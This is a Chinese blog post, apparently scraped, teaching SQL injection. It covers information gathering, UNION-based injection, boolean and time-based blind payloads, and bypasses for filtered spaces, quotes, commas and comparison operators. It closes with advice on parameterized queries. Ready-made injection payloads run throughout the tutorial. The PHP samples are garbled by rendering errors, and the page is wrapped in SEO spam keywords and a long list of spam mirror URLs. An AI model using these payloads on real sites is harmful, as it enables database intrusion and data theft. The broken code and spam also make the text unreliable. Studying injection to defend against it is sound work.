做网站页面代码,淘宝优惠劵网站建设,石家庄官网设计及搭建,网上课程网站前言
严正声明#xff1a;本博文所讨论的技术仅用于研究学习#xff0c;旨在增强读者的信息安全意识#xff0c;提高信息安全防护技能#xff0c;严禁用于非法活动。任何个人、团体、组织不得用于非法目的#xff0c;违法犯罪必将受到法律的严厉制裁。
【点击此处即可获…前言
严正声明本博文所讨论的技术仅用于研究学习旨在增强读者的信息安全意识提高信息安全防护技能严禁用于非法活动。任何个人、团体、组织不得用于非法目的违法犯罪必将受到法律的严厉制裁。
【点击此处即可获取282G网络安全零基础入门学习资源】
信息搜集
信息搜集在 SQL 注入攻击中扮演着重要的角色它为攻击者提供了关键的目标数据库和应用程序信息帮助攻击者更好地进行后续的攻击操作。
信息搜集主要包括以下几个方面
1.识别和了解目标数据库获取目标数据库的类型、版本、表结构、列名以及其他关键信息。 2.获取敏感信息获取目标数据库中的敏感信息如用户名、密码、用户权限、财务信息等。 3.发现漏洞和弱点发现目标应用程序的漏洞和弱点如不安全的输入验证、不当的错误处理机制等。 4.判断注入点和注入类型确定目标应用程序存在的注入点即用户输入数据直接或间接进入 SQL 语句的位置。同时了解到目标应用程序的数据库交互方式如直接构造 SQL 语句、使用存储过程等从而选择最适合的注入类型和方法。
使用以下一些指令获取相关信息
1.select version():获取数据库版本 2.select user():获取数据库用户名 3.select database()获取数据库名 4.select datadir获取数据库路径 5.select version_compile_os获取操作系统版本
注入入门
基础注入
假设一个网站的部分源码如下所示 $sql “SELECT * FROM users where name”; $sql . $_GET[“name”].“”; r e s u l t m y s q l q u e r y ( result mysql_query( resultmysqlquery(sql); if (KaTeX parse error: Expected }, got EOF at end of input: …lt) { while (row mysql_fetch_assoc( r e s u l t ) ) e c h o t r ; e c h o t d . result)) echo tr; echo td. result))echotr;echotd.row[‘id’].“”; echo “”. r o w [ ′ n a m e ′ ] . / t d ; e c h o t d . row[name]./td; echo td. row[′name′]./td;echotd.row[‘age’].“”; echo “”; } echo “”; 那么我们根据其 SQL 语句 SELECT * FROM users where name’ 进行正常查询时可以发现不管有没有这个用户名 name最终都会显示出结果运行结果如下 那么我们据此构造一些恶意语句比如说使用 union 进行联合查询使用 union 需要保证前后查询的字段数量保持一致否则会报错运行结果如下所示 那么根据上述原理我们可以匹配出网页源码中 SQL 语句里的 * 代表着 5 个字段运行结果如下所示
我们可以构造 SQL 收集一些信息比如 admin union select version(),user(),database(),4,5–运行结果如下
SQL 盲注
SQL 盲注是指在进行网络安全测试或攻击时攻击者通过检测系统的响应来确定系统中存在的漏洞或薄弱点的一种方法。攻击者通常会发送特定的请求到目标系统并观察系统的响应如果响应的结果与预期不符那么可能存在漏洞。通过不断尝试不同的请求和观察响应攻击者可以逐步获得关于目标系统的信息并利用这些信息进行进一步的攻击。 假设一个网站的部分源码如下所示 $sql “SELECT * FROM users ORDER BY ; $sql mysql_real_escape_string($_GET[order]).”; r e s u l t m y s q l q u e r y ( result mysql_query( resultmysqlquery(sql); 接下来我们将采用布尔盲注和时间盲注的方式进行攻击。
布尔盲注
布尔盲注是指在进行 SQL 注入时根据返回的结果是 True 或者是 False 来得到数据库中的相关信息。 由于网站源码是对 order by 进行了拼接因此我们不能再使用 union 等方法进行注入而且这里并没有报错输出因此采用布尔盲注的方式为了方便调试接下来将以 BP 抓包的形式展现。 首先是正常的进行请求运行结果如下
接下来使用布尔盲注因为上个例子已经知道数据库名是 exercises因此这里就不做过多猜测注入语句如下 ordername RLIKE (SELECT (CASE WHEN (ORD(MID((IFNULL(CAST(DATABASE() AS NCHAR),0x20)),1,1))100) THEN 0x6e616d65 ELSE 0x28 END)) 解释一下上述的 SQL 语句这句 SQL 的目的是通过判断数据库名的第一个字符的 ASCII 码值是否大于100e 是101来实现一个条件查询的排序。如果第一个字符的 ASCII 码值大于100则按照字段名 name 0x6e616d65升序排序否则按照括号字符 ( 0x28的 ASCII 码值来排序。 同时这句 SQL 中使用了一些函数和技巧 MID() 函数用于提取字符串的部分字符。 IFNULL() 函数用于判断数据库名是否为空如果为空则返回一个空格字符 “0x20”。 CAST() 函数用于将数据库名转换为 NCHAR 类型。 ORD() 函数用于获取一个字符的 ASCII 码值。 CASE WHEN 语句用于判断 ASCII 码值是否大于100。 运行结果 推断数据库名的第二个字符的 SQL 语句如下 ordername RLIKE (SELECT (CASE WHEN (ORD(MID((IFNULL(CAST(DATABASE() AS NCHAR),0x20)),2,1))119) THEN 0x6e616d65 ELSE 0x28 END)) 接下来以此类推就可以了。
时间盲注
除了布尔盲注之外还存在其他的盲注方式比如时间盲注。
时间盲注是指攻击者向目标应用程序发送恶意的请求时如果存在时间盲注漏洞应用程序可能会有不同的响应时间。
正常查询时所需时间如下 构造时间盲注的 SQL 语句 orderage and if(ascii(substr(database(),1,1))101,sleep(1),1)– 运行结果
绕过方式
为了避免 SQL 注入攻击应用程序会对输入数据进行适当的验证和过滤而 hacker 会绞尽脑汁地想办法去进行绕过以下是一些常见的绕过方式。
空格被过滤
1、使用 /xxx/ 行内注释或者 () 进行绕过 SELECT/1/username,password/1/FROM/1/users; SELECT(username),(password)FROM(users); 2、使用 %09 %0a %0b %0c %0d %a0 等不可见字符进行绕过
%09TAB 键水平 %0a新建一行 %0bTAB 键垂直 %0c新的一页 %0dreturn 功能 %a0空格 假设一个网站的部分源码如下所示 if (preg_match(‘/ /’, $_GET[“name”])) { die(“ERROR NO SPACE”); } $sql “SELECT * FROM users where name”; $sql . $_GET[“name”].“”; r e s u l t m y s q l q u e r y ( result mysql_query( resultmysqlquery(sql); 如果是正常注入的话会发现空格被过滤了导致注入失败
因此我们需要使用不可见字符替换空格下面将使用 %a0 进行替换
引号被过滤
使用十六进制代替字符串比如将 sidiot 的十六进制表示为 0x736964696f74 SELECT username, password FROM users WHERE username0x736964696f74 逗号被过滤
1、使用 from for 代替逗号 #替换前 select substr(database(),1,1); #替换后 select substr(database() from 1 for 1); 2、使用 join 代替逗号 #替换前 select 1,2; #替换后 select * from (select 1)a join (select 2)b; 3、使用 offset 代替逗号 #替换前 select * from users limit 0,1; #替换后 select * from users limit 1 offset 0; 比较符号被过滤
1、用 like, rlike, regexp 代替 select * from users where username like ‘sidiot’; select * from users where username rlike ‘sidiot’; select * from users where username regexp ‘sidiot’; 2、用 greatest()、least() 代替 #替换前 select * from users where id1 and ascii(substr(database(),0,1))64; #替换后 select * from users where id1 and greatest(ascii(substr(database(),0,1)),64)64; select * from users where id1 and least(ascii(substr(database(),1,1)),64)64; or/and/xor/not 被过滤 and or || xor | not ! 常用函数被过滤 hex()、bin() ascii() sleep() benchmark() concat_ws() group_concat() mid()、substr() substring() user user() datadir datadir() 后记
通过本文的讲解我们对 SQL 注入漏洞有了更深入的理解。了解了信息搜集在 SQL 注入过程中的重要性并学习了一些基础的入门注入技巧和常用的绕过注入方法。因此我们要意识到 SQL 注入对系统安全造成的严重威胁在设计和开发阶段就采取必要的安全措施例如使用参数化查询和限制权限访问等建立更安全的应用程序并保护数据的安全性。 以上就是 SQL 注入漏洞之理论讲解 的所有内容了希望本篇博文对大家有所帮助 严正声明本博文所讨论的技术仅用于研究学习旨在增强读者的信息安全意识提高信息安全防护技能严禁用于非法活动。任何个人、团体、组织不得用于非法目的违法犯罪必将受到法律的严厉制裁。
网络安全学习路线
对于零基础想入门网络安全的同学我整理了一份网络安全学习资料给大家包含成长路线、视频教程、工具安装包、网安面试题等资料。
需要的小伙伴点击此处即可获取 【以上资源点击此处即可无偿获取】 文章转载自: http://www.morning.fwmln.cn.gov.cn.fwmln.cn http://www.morning.pfmsh.cn.gov.cn.pfmsh.cn http://www.morning.qkdbz.cn.gov.cn.qkdbz.cn http://www.morning.yqsr.cn.gov.cn.yqsr.cn http://www.morning.fbzyc.cn.gov.cn.fbzyc.cn http://www.morning.kwksj.cn.gov.cn.kwksj.cn http://www.morning.hgwsj.cn.gov.cn.hgwsj.cn http://www.morning.qzbwmf.cn.gov.cn.qzbwmf.cn http://www.morning.lnbcx.cn.gov.cn.lnbcx.cn http://www.morning.tllws.cn.gov.cn.tllws.cn http://www.morning.nyqxy.cn.gov.cn.nyqxy.cn http://www.morning.pmjw.cn.gov.cn.pmjw.cn http://www.morning.sblgt.cn.gov.cn.sblgt.cn http://www.morning.wyrsn.cn.gov.cn.wyrsn.cn http://www.morning.dwfzm.cn.gov.cn.dwfzm.cn http://www.morning.qpqwd.cn.gov.cn.qpqwd.cn http://www.morning.tqgx.cn.gov.cn.tqgx.cn http://www.morning.npgwb.cn.gov.cn.npgwb.cn http://www.morning.pzlcd.cn.gov.cn.pzlcd.cn http://www.morning.chehb.com.gov.cn.chehb.com http://www.morning.ttdbr.cn.gov.cn.ttdbr.cn http://www.morning.qkskm.cn.gov.cn.qkskm.cn http://www.morning.ydhck.cn.gov.cn.ydhck.cn http://www.morning.jlnlr.cn.gov.cn.jlnlr.cn http://www.morning.djpgc.cn.gov.cn.djpgc.cn http://www.morning.tkzrh.cn.gov.cn.tkzrh.cn http://www.morning.skqfx.cn.gov.cn.skqfx.cn http://www.morning.qsy40.cn.gov.cn.qsy40.cn http://www.morning.dzqr.cn.gov.cn.dzqr.cn http://www.morning.egmux.cn.gov.cn.egmux.cn http://www.morning.mglqf.cn.gov.cn.mglqf.cn http://www.morning.lgznc.cn.gov.cn.lgznc.cn http://www.morning.fwjfh.cn.gov.cn.fwjfh.cn http://www.morning.yodajy.cn.gov.cn.yodajy.cn http://www.morning.xprq.cn.gov.cn.xprq.cn http://www.morning.blxlf.cn.gov.cn.blxlf.cn http://www.morning.gxqpm.cn.gov.cn.gxqpm.cn http://www.morning.zfkxj.cn.gov.cn.zfkxj.cn http://www.morning.xbmwm.cn.gov.cn.xbmwm.cn http://www.morning.wjhpg.cn.gov.cn.wjhpg.cn http://www.morning.ydxg.cn.gov.cn.ydxg.cn http://www.morning.dbddm.cn.gov.cn.dbddm.cn http://www.morning.wmhlz.cn.gov.cn.wmhlz.cn http://www.morning.qwwcf.cn.gov.cn.qwwcf.cn http://www.morning.fgkrh.cn.gov.cn.fgkrh.cn http://www.morning.gkdqt.cn.gov.cn.gkdqt.cn http://www.morning.fdmtr.cn.gov.cn.fdmtr.cn http://www.morning.hcrxn.cn.gov.cn.hcrxn.cn http://www.morning.xbtlt.cn.gov.cn.xbtlt.cn http://www.morning.baguiwei.com.gov.cn.baguiwei.com http://www.morning.plgbh.cn.gov.cn.plgbh.cn http://www.morning.hxsdh.cn.gov.cn.hxsdh.cn http://www.morning.lwsct.cn.gov.cn.lwsct.cn http://www.morning.hlnrj.cn.gov.cn.hlnrj.cn http://www.morning.drjll.cn.gov.cn.drjll.cn http://www.morning.pdmc.cn.gov.cn.pdmc.cn http://www.morning.shyqcgw.cn.gov.cn.shyqcgw.cn http://www.morning.hlxpz.cn.gov.cn.hlxpz.cn http://www.morning.txzqf.cn.gov.cn.txzqf.cn http://www.morning.jbctp.cn.gov.cn.jbctp.cn http://www.morning.nfsrs.cn.gov.cn.nfsrs.cn http://www.morning.xmnlc.cn.gov.cn.xmnlc.cn http://www.morning.xfncq.cn.gov.cn.xfncq.cn http://www.morning.tcfhs.cn.gov.cn.tcfhs.cn http://www.morning.qlwfz.cn.gov.cn.qlwfz.cn http://www.morning.pcrzf.cn.gov.cn.pcrzf.cn http://www.morning.lbywt.cn.gov.cn.lbywt.cn http://www.morning.pqbkk.cn.gov.cn.pqbkk.cn http://www.morning.mjtft.cn.gov.cn.mjtft.cn http://www.morning.ztfzm.cn.gov.cn.ztfzm.cn http://www.morning.dnzyx.cn.gov.cn.dnzyx.cn http://www.morning.tbjtm.cn.gov.cn.tbjtm.cn http://www.morning.fdxhk.cn.gov.cn.fdxhk.cn http://www.morning.wrwcf.cn.gov.cn.wrwcf.cn http://www.morning.mljtx.cn.gov.cn.mljtx.cn http://www.morning.rflcy.cn.gov.cn.rflcy.cn http://www.morning.nnmnz.cn.gov.cn.nnmnz.cn http://www.morning.zrpbf.cn.gov.cn.zrpbf.cn http://www.morning.fydsr.cn.gov.cn.fydsr.cn http://www.morning.qwfl.cn.gov.cn.qwfl.cn
